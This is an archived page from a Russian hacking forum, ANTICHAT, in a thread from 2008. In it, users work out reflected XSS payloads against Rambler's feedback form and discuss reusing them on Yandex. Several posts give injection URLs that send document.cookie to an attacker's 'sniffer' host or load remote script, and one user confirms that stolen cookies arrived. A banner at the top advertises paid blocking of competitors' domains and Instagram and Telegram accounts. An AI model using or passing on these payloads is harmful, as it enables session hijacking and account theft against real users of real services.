УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 77 из 1393

Опции темы

Поиск в этой теме

Опции просмотра

#761

21.01.2008, 15:20

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

1) яндекс
там фильтруются ; ? " + поэтому твой скрипт и не работает.
2) рамблер
фильтруется +

необходимо использовать кодирование.

#762

21.01.2008, 15:26

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

У меня в опере сработало вот так

Код:

http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>

#763

21.01.2008, 15:37

frigid20

Новичок

Регистрация: 19.01.2008

Сообщений: 19

Провел на форуме:
71644

Репутация: 11

Цитата:

Сообщение от krypt3r

У меня в опере сработало вот так

Код:

http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>

под "сработало" ты имееш ввиду то что куки на сниффер пришли?

#764

21.01.2008, 15:49

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Нет, у меня под рукой нету снифера, так бы проверил. Закодируй + на %2b и в скрипте заюзай

Код:

location.href='http://путь_до_снифера.gif?'%2bdocument.cookie

А еще лучше все закодируй, чтоб палева не было =)

#765

21.01.2008, 15:55

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

для рамблера:

Код:

http://www.rambler.ru/db/support/feedback.shtml?name=<IMG%20SRC=javascript:location.href='адрес_снифера'%2bdocument.cookie>

#766

21.01.2008, 16:00

Macro

Постоянный

Регистрация: 11.11.2006

Сообщений: 595

Провел на форуме:
1845062

Репутация: 1079

А еще лучше
http://www.rambler.ru/db/support/feedback.shtml?name=<script src=http://[путь к файлу с яваскриптом]></script>

либо

http://www.rambler.ru/db/support/feedback.shtml?name=<script>eval(unescape([тут эскейпенный код]))</script>

#767

21.01.2008, 16:12

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Короче, набросал на скорую руку снифер, нормально куки пришли с рамблера

#768

21.01.2008, 16:33

frigid20

Новичок

Регистрация: 19.01.2008

Сообщений: 19

Провел на форуме:
71644

Репутация: 11

Цитата:

Сообщение от krypt3r

Короче, набросал на скорую руку снифер, нормально куки пришли с рамблера

респект! работает

#769

21.01.2008, 16:48

frigid20

Новичок

Регистрация: 19.01.2008

Сообщений: 19

Провел на форуме:
71644

Репутация: 11

а с яндексом как? не могу чето ему целку вскрыть....

#770

21.01.2008, 16:51

Macro

Постоянный

Регистрация: 11.11.2006

Сообщений: 595

Провел на форуме:
1845062

Репутация: 1079

Так, как я написал про рамблер... Точно так же сработает

Страница 77 из 1393

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход